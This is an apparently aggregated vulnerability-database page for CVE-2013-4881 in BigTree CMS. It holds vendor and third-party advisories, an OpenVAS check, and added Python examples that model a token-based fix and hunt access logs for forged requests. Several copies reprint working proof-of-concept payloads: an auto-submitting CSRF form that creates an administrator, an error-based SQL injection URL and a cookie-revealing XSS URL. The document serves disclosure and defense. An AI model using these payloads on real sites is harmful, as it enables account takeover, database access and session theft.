ID CVE-2013-4881 Type cve Reporter cve@mitre.org Modified 2017-08-29T01:33:00
Description
Cross-site request forgery (CSRF) vulnerability in core/admin/modules/users/create.php in BigTree CMS 4.0 RC2 and earlier allows remote attackers to hijack the authentication of administrators for requests that create an administrative user via an add user action to index.php.
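The published PoC (an auto-submitting HTML form posting to /site/index.php/admin/users/create/) works because the vulnerable create handler trusts the administrator's session cookie alone, which the browser attaches to any cross-site POST. The following is an added example, not BigTree CMS code and not the vendor's fix (that lives in the GitHub commits cited in the advisories below): a Python model of the pre-fix handler beside a hardened one that requires a per-session anti-CSRF token and refuses cross-origin submissions. The Request and Session classes, the cookie name and SITE_ORIGIN are assumptions made for this demonstration; the form field names (email, password, level, name, company) are the ones from the public PoC.

```python
"""
Added example for CVE-2013-4881 (not BigTree CMS code and not part of the
advisory): a model of the pre-fix users/create handler, which trusts the
session cookie alone, beside a hardened version that requires a per-session
anti-CSRF token and rejects cross-origin submissions. The Request/Session
classes, the cookie name and SITE_ORIGIN are assumptions made for this
demonstration; the form field names come from the public PoC.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

SITE_ORIGIN = "http://www.example.com"  # assumed origin of the BigTree install
COOKIE_NAME = "bigtree_admin"            # assumed session cookie name


@dataclass
class Request:
    """Minimal stand-in for an HTTP POST as the server sees it."""
    cookies: dict
    form: dict
    headers: dict = field(default_factory=dict)


@dataclass
class Session:
    admin_id: int
    # One unguessable token per login; embedded as a hidden field in real forms.
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


SESSIONS = {}  # cookie value -> Session (constructed in-memory session store)


def login_admin(admin_id):
    cookie = secrets.token_urlsafe(16)
    SESSIONS[cookie] = Session(admin_id)
    return cookie


def _same_origin(url):
    want = urlsplit(SITE_ORIGIN)
    got = urlsplit(url)
    return (got.scheme, got.netloc) == (want.scheme, want.netloc)


def create_user_vulnerable(req, users):
    """Models the vulnerable behaviour: a valid admin session is the only gate,
    so any page the admin's browser loads can submit this form with the cookie."""
    sess = SESSIONS.get(req.cookies.get(COOKIE_NAME))
    if sess is None:
        return "401 not logged in"
    users.append({"email": req.form["email"], "level": int(req.form["level"])})
    return "302 created"


def create_user_fixed(req, users):
    """Hardened handler: same session check, then origin check, then token check."""
    sess = SESSIONS.get(req.cookies.get(COOKIE_NAME))
    if sess is None:
        return "401 not logged in"
    # Defence in depth: if the browser tells us where the POST came from and it
    # is not our own origin, refuse before touching the form at all.
    source = req.headers.get("Origin") or req.headers.get("Referer")
    if source and not _same_origin(source):
        return "403 cross-origin"
    # The real control: a forged page cannot read the victim's token, so it
    # cannot include it. Constant-time comparison avoids leaking it byte by byte.
    token = req.form.get("csrf_token", "")
    if not hmac.compare_digest(token, sess.csrf_token):
        return "403 bad csrf token"
    users.append({"email": req.form["email"], "level": int(req.form["level"])})
    return "302 created"


def demo():
    """Replays the PoC's hidden fields against both handlers; returns the outcomes."""
    cookie = login_admin(admin_id=1)
    poc_fields = {"email": "user@email.com", "password": "password",
                  "level": "1", "name": "attacker", "company": "company"}
    # Browser auto-submits the attacker's form: cookie attached, Referer is the lure.
    forged = Request({COOKIE_NAME: cookie}, dict(poc_fields),
                     {"Referer": "http://attacker.invalid/lure.html"})
    # Same, but from a browser or proxy that strips Referer and sends no Origin.
    forged_quiet = Request({COOKIE_NAME: cookie}, dict(poc_fields))
    # Genuine submission from BigTree's own add-user page carries the token.
    legit = Request({COOKIE_NAME: cookie},
                    dict(poc_fields, csrf_token=SESSIONS[cookie].csrf_token),
                    {"Origin": SITE_ORIGIN})
    results = {}
    for name, handler, req in [("forged_vs_vulnerable", create_user_vulnerable, forged),
                               ("forged_vs_fixed", create_user_fixed, forged),
                               ("forged_quiet_vs_fixed", create_user_fixed, forged_quiet),
                               ("legit_vs_fixed", create_user_fixed, legit)]:
        users = []
        results[name] = (handler(req, users), len(users))
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

Two points worth noting when reading the outcomes: the origin check alone is not sufficient, because a client that sends neither Origin nor Referer sails past it, which is why the token comparison is the control that actually decides. Separately, Chromium-based browsers now default cookies to SameSite=Lax, so the cookie is not sent on a cross-site top-level POST and the 2013 PoC usually fails there even against unpatched code; that is a browser-side mitigation, not a fix for the handler.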
{"exploitdb": [{"lastseen": "2016-02-04T08:39:03", "bulletinFamily": "exploit", "description": "BigTree CMS Cross Site Request Forgery Vulnerability. CVE-2013-4881. Webapps exploit for php platform", "modified": "2013-07-17T00:00:00", "published": "2013-07-17T00:00:00", "id": "EDB-ID:38690", "href": "https://www.exploit-db.com/exploits/38690/", "type": "exploitdb", "title": "BigTree CMS Cross Site Request Forgery Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/61702/info\r\n\r\nBigTree CMS is prone to a cross-site request-forgery vulnerability.\r\n\r\nExploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.\r\n\r\nBigTree CMS 4.0 RC2 is vulnerable; other versions may also be affected. \r\n\r\n<form action=\"http://www.example.com/site/index.php/admin/users/create/\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"email\" value=\"user@email.com\">\r\n<input type=\"hidden\" name=\"password\" value=\"password\">\r\n<input type=\"hidden\" name=\"level\" value=\"1\">\r\n<input type=\"hidden\" name=\"name\" value=\"attacker\">\r\n<input type=\"hidden\" name=\"company\" value=\"company\">\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.main.submit();\r\n</script>\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/38690/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:48", "bulletinFamily": "software", "description": "\r\n\r\nAdvisory ID: HTB23165\r\nProduct: BigTree CMS\r\nVendor: BigTree CMS\r\nVulnerable Version(s): 4.0 RC2 and probably prior\r\nTested Version: 4.0 RC2\r\nVendor Notification: July 17, 2013 \r\nVendor Patch: July 17, 2013 \r\nPublic Disclosure: August 7, 2013 \r\nVulnerability Type: SQL Injection [CWE-89], Cross-Site Scripting [CWE-79], Cross-Site Request Forgery 
[CWE-352]\r\nCVE References: CVE-2013-4879, CVE-2013-4880\r\nRisk Level: High \r\nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P), 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in BigTree CMS, which can be exploited to perform SQL injection, Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) attacks. A remote attacker can add, modify or delete information in application's database and gain complete control over the application.\r\n\r\n\r\n1) SQL Injection in BigTree CMS: CVE-2013-4879\r\n\r\nThe vulnerability exists due to insufficient sanitisation of user-supplied data passed to "/site/index.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database.\r\n\r\nThe following PoC (Proof of Concept) code displays version of MySQL server:\r\n\r\nhttp://[host]/site/index.php/%27and%28select%201%20from%28select%20count%28*%29%2cconcat%28%28select%20concat%28version%28%29%29%29%2cfloor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%27\r\n\r\n\r\n2) \u0421ross-Site Request Forgery (CSRF) in BigTree CMS: CVE-2013-4881\r\n\r\nThe vulnerability exists due to insufficient validation of the HTTP request origin. 
A remote attacker can create a malicious web page with CSRF exploit, trick a logged-in administrator into opening that page and create a new user with administrative privileges.\r\n\r\nThe basic CSRF exploit below will create a new administrator "attacker" with password "password":\r\n\r\n\r\n<form action="http://[host]/site/index.php/admin/users/create/" method="post" name="main">\r\n<input type="hidden" name="email" value="user@email.com">\r\n<input type="hidden" name="password" value="password">\r\n<input type="hidden" name="level" value="1">\r\n<input type="hidden" name="name" value="attacker">\r\n<input type="hidden" name="company" value="company">\r\n<input type="submit" id="btn">\r\n</form>\r\n<script>\r\ndocument.main.submit();\r\n</script>\r\n\r\n\r\n\r\n3) Cross-Site Scripting (XSS) in BigTree CMS: CVE-2013-4880\r\n\r\nThe vulnerability exists due to insufficient filtration of user-supplied data in "module" HTTP GET parameter passed to "/site/index.php/admin/developer/modules/views/add/" URL. 
A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display administrator's cookies:\r\n\r\nhttp://[host]/site/index.php/admin/developer/modules/views/add/?module=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&table=1&title=dolfbnwl\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nReplace the following files with their updated versions from GitHub:\r\ncore/inc/bigtree/cms.php\r\ncore/admin/modules/users/create.php\r\ncore/admin/modules/developer/modules/views/add.php\r\n\r\nMore Information:\r\nhttps://github.com/bigtreecms/BigTree-CMS/commit/c5f27bf66a7f35bd3daeb5f693f3e2493f51b1f3\r\nhttps://github.com/bigtreecms/BigTree-CMS/commit/4b0faa90fa8b9e1776c86db716894dcd7e6b4834\r\nhttps://github.com/bigtreecms/BigTree-CMS/commit/8a59c2e13f8e151b6a9e98f73e641e1ec8d928df\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23165 - https://www.htbridge.com/advisory/HTB23165 - Multiple Vulnerabilities in BigTree CMS.\r\n[2] BigTree CMS - http://www.bigtreecms.org/ - BigTree CMS is an open source content management system built on PHP and MySQL.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. 
\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "modified": "2013-09-09T00:00:00", "published": "2013-09-09T00:00:00", "id": "SECURITYVULNS:DOC:29773", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29773", "title": "Multiple Vulnerabilities in BigTree CMS", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:16:57", "bulletinFamily": "exploit", "description": "", "modified": "2013-08-08T00:00:00", "published": "2013-08-08T00:00:00", "href": "https://packetstormsecurity.com/files/122736/BigTree-CMS-4.0-RC2-XSS-CSRF-SQL-Injection.html", "id": "PACKETSTORM:122736", "type": "packetstorm", "title": "BigTree CMS 4.0 RC2 XSS / CSRF / SQL Injection", "sourceData": "`Advisory ID: HTB23165 \nProduct: BigTree CMS \nVendor: BigTree CMS \nVulnerable Version(s): 4.0 RC2 and probably prior \nTested Version: 4.0 RC2 \nVendor Notification: July 17, 2013 \nVendor Patch: July 17, 2013 \nPublic Disclosure: August 7, 2013 \nVulnerability Type: SQL Injection [CWE-89], Cross-Site Scripting [CWE-79], Cross-Site Request Forgery [CWE-352] \nCVE References: CVE-2013-4879, CVE-2013-4880 \nRisk Level: High \nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P), 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge 
Security Research Lab discovered multiple vulnerabilities in BigTree CMS, which can be exploited to perform SQL injection, Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) attacks. A remote attacker can add, modify or delete information in application's database and gain complete control over the application. \n \n \n1) SQL Injection in BigTree CMS: CVE-2013-4879 \n \nThe vulnerability exists due to insufficient sanitisation of user-supplied data passed to \"/site/index.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. \n \nThe following PoC (Proof of Concept) code displays version of MySQL server: \n \nhttp://[host]/site/index.php/%27and%28select%201%20from%28select%20count%28*%29%2cconcat%28%28select%20concat%28version%28%29%29%29%2cfloor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%27 \n \n \n2) \u0421ross-Site Request Forgery (CSRF) in BigTree CMS: CVE-2013-4881 \n \nThe vulnerability exists due to insufficient validation of the HTTP request origin. A remote attacker can create a malicious web page with CSRF exploit, trick a logged-in administrator into opening that page and create a new user with administrative privileges. 
\n \nThe basic CSRF exploit below will create a new administrator \"attacker\" with password \"password\": \n \n \n<form action=\"http://[host]/site/index.php/admin/users/create/\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"email\" value=\"user@email.com\"> \n<input type=\"hidden\" name=\"password\" value=\"password\"> \n<input type=\"hidden\" name=\"level\" value=\"1\"> \n<input type=\"hidden\" name=\"name\" value=\"attacker\"> \n<input type=\"hidden\" name=\"company\" value=\"company\"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.main.submit(); \n</script> \n \n \n \n3) Cross-Site Scripting (XSS) in BigTree CMS: CVE-2013-4880 \n \nThe vulnerability exists due to insufficient filtration of user-supplied data in \"module\" HTTP GET parameter passed to \"/site/index.php/admin/developer/modules/views/add/\" URL. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. 
\n \nThe exploitation example below uses the \"alert()\" JavaScript function to display administrator's cookies: \n \nhttp://[host]/site/index.php/admin/developer/modules/views/add/?module=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&table=1&title=dolfbnwl \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nReplace the following files with their updated versions from GitHub: \ncore/inc/bigtree/cms.php \ncore/admin/modules/users/create.php \ncore/admin/modules/developer/modules/views/add.php \n \nMore Information: \nhttps://github.com/bigtreecms/BigTree-CMS/commit/c5f27bf66a7f35bd3daeb5f693f3e2493f51b1f3 \nhttps://github.com/bigtreecms/BigTree-CMS/commit/4b0faa90fa8b9e1776c86db716894dcd7e6b4834 \nhttps://github.com/bigtreecms/BigTree-CMS/commit/8a59c2e13f8e151b6a9e98f73e641e1ec8d928df \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23165 - https://www.htbridge.com/advisory/HTB23165 - Multiple Vulnerabilities in BigTree CMS. \n[2] BigTree CMS - http://www.bigtreecms.org/ - BigTree CMS is an open source content management system built on PHP and MySQL. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. 
The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/122736/bigtreecms-sqlxssxsrf.txt"}], "htbridge": [{"lastseen": "2017-06-23T23:08:25", "bulletinFamily": "software", "description": "High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in BigTree CMS, which can be exploited to perform SQL injection, Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) attacks. A remote attacker can add, modify or delete information in application's database and gain complete control over the application. \n \n1) SQL Injection in BigTree CMS: CVE-2013-4879 \nThe vulnerability exists due to insufficient sanitisation of user-supplied data passed to \"/site/index.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. \nThe following PoC (Proof of Concept) code displays version of MySQL server: \nhttp://[host]/site/index.php/%27and%28select%201%20from%28select%20count%28* %29%2cconcat%28%28select%20concat%28version%28%29%29%29%2cfloor%28rand%280%2 9*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%27 \nSQL injection vulnerability was independently discovered by the Vendor just before High-Tech Bridge Security Research Lab. \n \n2) \u0421ross-Site Request Forgery (CSRF) in BigTree CMS: CVE-2013-4881 \nThe vulnerability exists due to insufficient validation of the HTTP request origin. A remote attacker can create a malicious web page with CSRF exploit, trick a logged-in administrator into opening that page and create a new user with administrative privileges. 
\nThe basic CSRF exploit below will create a new administrator \"attacker\" with password \"password\": \n<form action=\"http://[host]/site/index.php/admin/users/create/\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"email\" value=\"user@email.com\"> \n<input type=\"hidden\" name=\"password\" value=\"password\"> \n<input type=\"hidden\" name=\"level\" value=\"1\"> \n<input type=\"hidden\" name=\"name\" value=\"attacker\"> \n<input type=\"hidden\" name=\"company\" value=\"company\"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.main.submit(); \n</script> \n \n3) Cross-Site Scripting (XSS) in BigTree CMS: CVE-2013-4880 \nThe vulnerability exists due to insufficient filtration of user-supplied data in \"module\" HTTP GET parameter passed to \"/site/index.php/admin/developer/modules/views/add/\" URL. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. 
\nThe exploitation example below uses the \"alert()\" JavaScript function to display administrator's cookies: \nhttp://[host]/site/index.php/admin/developer/modules/views/add/?module=%22%3 E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&table=1&title=dolfbnwl\n", "modified": "2013-07-17T00:00:00", "published": "2013-07-17T00:00:00", "id": "HTB23165", "href": "https://www.htbridge.com/advisory/HTB23165", "type": "htbridge", "title": "Multiple Vulnerabilities in BigTree CMS", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P/"}}], "openvas": [{"lastseen": "2019-05-29T18:38:17", "bulletinFamily": "scanner", "description": "This host is installed with BigTree CMS and is prone to multiple\n vulnerabilities", "modified": "2018-10-12T00:00:00", "published": "2013-08-19T00:00:00", "id": "OPENVAS:1361412562310803869", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803869", "title": "BigTree CMS Multiple Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bigtree_cms_mult_vuln.nasl 11865 2018-10-12 10:03:43Z cfischer $\n#\n# BigTree CMS Multiple Vulnerabilities\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:bigtree:bigtree';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803869\");\n script_version(\"$Revision: 11865 $\");\n script_cve_id(\"CVE-2013-4879\", \"CVE-2013-4880\", \"CVE-2013-5313\", \"CVE-2013-4881\");\n script_bugtraq_id(61699, 61701, 61839, 61702);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 12:03:43 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-19 12:51:13 +0530 (Mon, 19 Aug 2013)\");\n script_name(\"BigTree CMS Multiple Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is installed with BigTree CMS and is prone to multiple\n vulnerabilities\");\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP GET request and check whether it is able to read the\n database version or not.\");\n script_tag(name:\"solution\", value:\"Upgrade to version 4.0 or later.\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - Improper sanitation of user-supplied input passed via the\n URL to the site/index.php script and 'module' parameter upon submission\n to '/admin/developer/modules/views/add/index.php' script\n\n - Cross-site request forgery (CSRF) vulnerability in\n core/admin/modules/users/create.php and core/admin/modules/users/update.php\");\n script_tag(name:\"affected\", value:\"BigTree CMS version 4.0 RC2 and prior\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to insert arbitrary HTML\n or script code, which 
will be executed in a user's browser session in the\n context of an affected site, hijack user session or manipulate SQL queries\n by injecting arbitrary SQL code.\");\n\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/86287\");\n script_xref(name:\"URL\", value:\"https://www.htbridge.com/advisory/HTB23165\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_bigtree_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"BigTree/Installed\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n script_xref(name:\"URL\", value:\"http://www.bigtreecms.org\");\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! dir = get_app_location( port:port, cpe:CPE ) ) exit( 0 );\n\nif(dir == \"/\") dir = \"\";\n\nurl = dir + \"/site/index.php/%27and%28select%201%20from%28select%20\"+\n \"count%28*%29%2cconcat%28%28select%20concat%28version%2\"+\n \"8%29%29%29%2cfloor%28rand%280%29*2%29%29x%20from%20inf\"+\n \"ormation_schema.tables%20group%20by%20x%29a%29and%27\";\n\nif(http_vuln_check(port:port, url:url, check_header:TRUE,\n pattern:\"<b>Fatal error</b>: Uncaught exception.*invalid sqlquery\\(\\).*Duplicate entry .([0-9.]+)\"))\n{\n report = report_vuln_url( port:port, url:url );\n security_message(port:port,data:report);\n exit(0);\n}\n\nexit(99);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
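The OpenVAS test above only confirms the SQL injection (CVE-2013-4879); it offers nothing for spotting whether the CSRF issue was actually used against an exposed install. A forged POST to the users/create endpoint (or users/update, which the OpenVAS insight also lists as CSRF-prone) is issued by the administrator's own browser while it renders the attacker's page, so in the web server's access log the Referer is a foreign site or absent, never the CMS's own add-user form. The following is an added example, not from the advisory, OpenVAS or BigTree, that hunts for exactly that pattern in combined-format access logs. The log lines are constructed for this demonstration; SITE_HOST and the watched paths are assumptions following the public PoC's URL.

```python
"""
Added example (not from the advisory, OpenVAS or BigTree): hunting for
CSRF-style user creation in web-server access logs. The log lines below are
constructed for this demonstration; the site host and watched paths follow the
public PoC's URL and the OpenVAS insight text.
"""
import re
from urllib.parse import urlsplit

SITE_HOST = "www.example.com"           # assumed host of the BigTree install
WATCH_PATHS = ("/admin/users/create/",  # endpoint hit by the published PoC
               "/admin/users/update/")  # also listed as CSRF-prone by the OpenVAS test

# Apache/nginx "combined" format: ip ident user [time] "req" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Constructed sample log: one genuine admin action, two forged ones, two noise lines.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Aug/2013:10:14:58 +0000] "GET /site/index.php/admin/users/add/ HTTP/1.1" 200 5120 "http://www.example.com/site/index.php/admin/users/" "Mozilla/5.0"
203.0.113.5 - - [07/Aug/2013:10:15:02 +0000] "POST /site/index.php/admin/users/create/ HTTP/1.1" 302 0 "http://www.example.com/site/index.php/admin/users/add/" "Mozilla/5.0"
203.0.113.5 - - [07/Aug/2013:11:02:41 +0000] "POST /site/index.php/admin/users/create/ HTTP/1.1" 302 0 "http://attacker.invalid/lure.html" "Mozilla/5.0"
203.0.113.5 - - [07/Aug/2013:11:09:17 +0000] "POST /site/index.php/admin/users/create/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [07/Aug/2013:11:10:00 +0000] "POST /site/index.php/admin/pages/create/ HTTP/1.1" 302 0 "http://evil.invalid/" "Mozilla/5.0"
"""


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return a reason if the entry looks like a cross-site user creation, else None."""
    if entry["method"] != "POST":
        return None
    path = urlsplit(entry["target"]).path
    if not any(w in path for w in WATCH_PATHS):
        return None
    referer = entry["referer"]
    if referer in ("", "-"):
        # Weaker signal: privacy tooling also strips Referer; still worth a look
        # because a submission from BigTree's own form would normally carry one.
        return "missing referer"
    if urlsplit(referer).netloc.lower() != SITE_HOST:
        return "cross-site referer"
    return None


def hunt_csrf(log_text):
    """Scan a combined-format log; return flagged entries with the reason."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reason = classify(entry)
        if reason:
            hits.append({"ts": entry["ts"], "ip": entry["ip"], "path": entry["target"],
                         "status": entry["status"], "referer": entry["referer"],
                         "reason": reason})
    return hits


if __name__ == "__main__":
    for hit in hunt_csrf(SAMPLE_LOG):
        print(hit)
```

A 302 on the flagged POST is the usual sign the account was created, so each hit should be followed by a review of the bigtree_users table for accounts added around that timestamp and a check that the install has the patched core/admin/modules/users/create.php. The missing-Referer case is deliberately reported with its own reason so it can be triaged at lower priority than a POST whose Referer names a foreign host.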